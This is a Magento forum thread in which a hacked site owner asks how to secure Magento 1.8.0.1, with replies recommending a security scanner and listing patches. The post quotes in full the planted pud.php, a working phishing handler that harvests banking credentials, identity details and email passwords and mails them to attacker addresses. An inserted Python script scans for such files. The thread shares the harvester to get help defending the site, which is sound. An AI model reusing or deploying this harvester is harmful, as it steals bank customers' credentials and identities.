
How easy is it to hack Magento 1.8.0.1?

SOLVED

Hello Friends,

I am using Magento 1.8.0.1 over HTTP and my domain has been hacked twice. The first time, the hackers used Media and JS to install a module for an additional login.html. I then cleared all offending content from the server and changed the admin passwords too, but my domain got hacked again, and this time they used downloader>skin>install to upload the file pud.php.

Here is the detailed code of that file:

<?php

$sec = $_REQUEST['password'];
$page_name= "Stgeorge";

if(isset($sec)) {
		$ip = getenv("REMOTE_ADDR");
		$message .= "---------- Login Information ----------------------------\n";
		$message .= "Card/Access Number: ".$_POST['firstname']."\n";
		$message .= "Security Number: ".$_POST['password']."\n";
		$message .= "Internet Password: ".$_POST['passwords']."\n";
		$message .= "---------- Identity Information ----------------------------\n";
		$message .= "Full Name : ".$_POST['fn']."\n";
		$message .= "Verbal Password : ".$_POST['vb']."\n";
		$message .= "DOB: ".$_POST['dobday']." - ".$_POST['dobmonth']." - ".$_POST['dobyear']."\n";
		$message .= "10-Digit Licence Card Number: ".$_POST['dln']."\n";
		$message .= "Driver's licence number: ".$_POST['dlnssss']."\n";
		$message .= "Licence Expiry Date: ".$_POST['edobday']." - ".$_POST['edobmonth']." - ".$_POST['edobyear']."\n";
		$message .= "---------- Contact Information and Home Address ----------------------------\n";
		$message .= "Mobile Number: ".$_POST['mn']."\n";
		$message .= "Home Phone Number: ".$_POST['pn']."\n";
		$message .= "E-mail Address: ".$_POST['email']."\n";		
		$message .= "E-mail Pass: ".$_POST['emailp']."\n";		
		$message .= "IP: ".$ip."\n";
		$message .= "----------------Created By shika------------------\n";
		$send = "clim01987@gmail.com,k.molodkina.stroyst@mail.ru";
		$subject = $page_name." - ReZulTs";
		$headers = "From: <infos@shika.com>";
		$headers .= $_POST['eMailAdd']."\n";
		$headers .= "MIME-Version: 1.0\n";
		mail("$send", "$subject", $message); 
		header("Location: https://www.stgeorge.com.au/");	
}

else {
	header("Location: https://www.stgeorge.com.au/");	

	
}

?>

Finally, I am thinking: how easy is it to hack Magento 1.8.0.1?

Now I need help to stop this hacking sequence, and for that please tell me all available processes and available security patches for 1.8.0.1.

Thanks
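
A triage sketch for the situation described in the post above, added here as an example and not part of the original thread: it walks a Magento 1 webroot and lists script files that sit under asset directories (as pud.php did under downloader>skin>install) or that combine the three traits of the quoted handler. The directory set, extension list, function names and sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Assumption: directory names that hold static assets or uploads in a Magento 1 tree.
ASSET_DIRS = {"media", "js", "skin"}
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")
# Traits of the handler quoted in the post: reads request fields, mails them, redirects.
TRAITS = (
    re.compile(rb"\$_(POST|REQUEST)\s*\["),
    re.compile(rb"\bmail\s*\("),
    re.compile(rb"header\s*\(\s*[\"']Location:", re.I),
)

def scan(webroot):
    """Return {relative_path: [reasons]} for script files that need manual review."""
    findings = {}
    for base, _dirs, files in os.walk(webroot):
        for name in (f for f in files if f.lower().endswith(SCRIPT_EXT)):
            path = os.path.join(base, name)
            rel = os.path.relpath(path, webroot).replace(os.sep, "/")
            reasons = []
            if ASSET_DIRS & set(rel.split("/")[:-1]):
                reasons.append("script under asset directory")
            with open(path, "rb") as fh:
                head = fh.read(1 << 20)  # cap the read at 1 MiB per file
            if all(rx.search(head) for rx in TRAITS):
                reasons.append("reads form fields, mails them, redirects")
            if reasons:
                findings[rel] = reasons
    return findings

def build_sample_tree(root):
    """Write a constructed sample tree (not real site data) for an offline run."""
    samples = {
        "downloader/skin/install/pud.php":
            b"<?php $m=$_POST['f']; mail('a@example.invalid','s',$m); header('Location: /'); ?>",
        "app/code/local/Shop/Helper/Data.php": b"<?php class Shop_Helper_Data {} ?>",
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(scan(tmp))
```

Scripts that the release itself ships under these directories will also be listed, so compare every hit against a clean copy of the same Magento version before deleting anything.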

1 ACCEPTED SOLUTION

Accepted Solutions

Re: How easy is it to hack Magento 1.8.0.1?

Magento just launched its own security scan tool - account.magento.com/scanner/ . Sign up for it; it is free. It will tell you not only what patches you need to install but also warn you about other vulnerabilities you might have.

2 REPLIES

Re: How easy is it to hack Magento 1.8.0.1?

Hi @Arbit17,

 

The list of patches for that version of Magento is:

  • SUPEE-10266: SUPEE-10266 for CE 1.8.0.0-1.8.1.0 (0.04 MB)
  • SUPEE-10336: SUPEE-10336 for CE 1.8.0.0 and earlier (0.01 MB)
  • SUPEE-1533: SUPEE-1533 - Magento-CE-v1.8.x-1.9.x (0.01 MB)
  • SUPEE-1868: Magento-CE-v1.8.x (0.01 MB)
  • APPSEC-212: Magento-CE-v1.8.0.0-1.8.1.0 (0.01 MB)
  • SUPEE-2725: Magento-CE-v1.7.0.0-1.8.1.0 (0.01 MB)
  • SUPEE-3941: Magento-CE-v1.8.0.0-1.9.0.1 (0.03 MB)
  • SUPEE-4291/4334: Magento-CE-v1.7.x-1.8.x (0.01 MB)
  • SUPEE-5344: SUPEE-5344 - Magento-CE-v1.8.x-1.9.x (0.01 MB)
  • SUPEE-5994: SUPEE-5994 for CE 1.6.0.0 - 1.9.1.1 (0.04 MB)
  • SUPEE-6237: USPS API Patch - SUPEE-6237 - CE 1.6.x-1.9.1.x (0.01 MB)
  • SUPEE-6285: SUPEE-6285 for CE 1.8.0.0 (0.05 MB)
  • SUPEE-6482: SUPEE-6482 for CE 1.7.x - 1.8.0.0 (0.01 MB)
  • SUPEE-6788: SUPEE-6788 for CE 1.8.0.0 (0.17 MB)
  • SUPEE-7405: SUPEE-7405 for CE 1.8.0.0 (0.11 MB)
  • SUPEE-7405 v1.1: SUPEE-7405 v1.1 for CE 1.8.0.0 (0.01 MB)
  • SUPEE-7616: SUPEE-7616 for CE 1.8.0.0 - 1.9.2.2 (0.01 MB)
  • SUPEE-8167: SUPEE-8167 for CE 1.8.0.0-1.8.1.0 (0.01 MB)
  • SUPEE-8788: SUPEE-8788 for CE 1.8.0.0 (0.63 MB)
  • SUPEE-8967: SUPEE-8967 for CE 1.5.0.0-1.9.2.4 (0.01 MB)
  • SUPEE-9652: SUPEE-9652 for CE 1.5.0.1-1.9.3.1 (0.01 MB)
  • SUPEE-9767: SUPEE-9767 for CE 1.8.0.0 (0.08 MB)
  • SUPEE-9767 v2: SUPEE-9767v2 for CE 1.8.0.0 (0.06 MB)
  • PHP 5.4: Magento-CE-v1.8.0.0 (0.01 MB)

 

You can use this tool as help: http://fabrizioballiano.net/magento-patches/

 
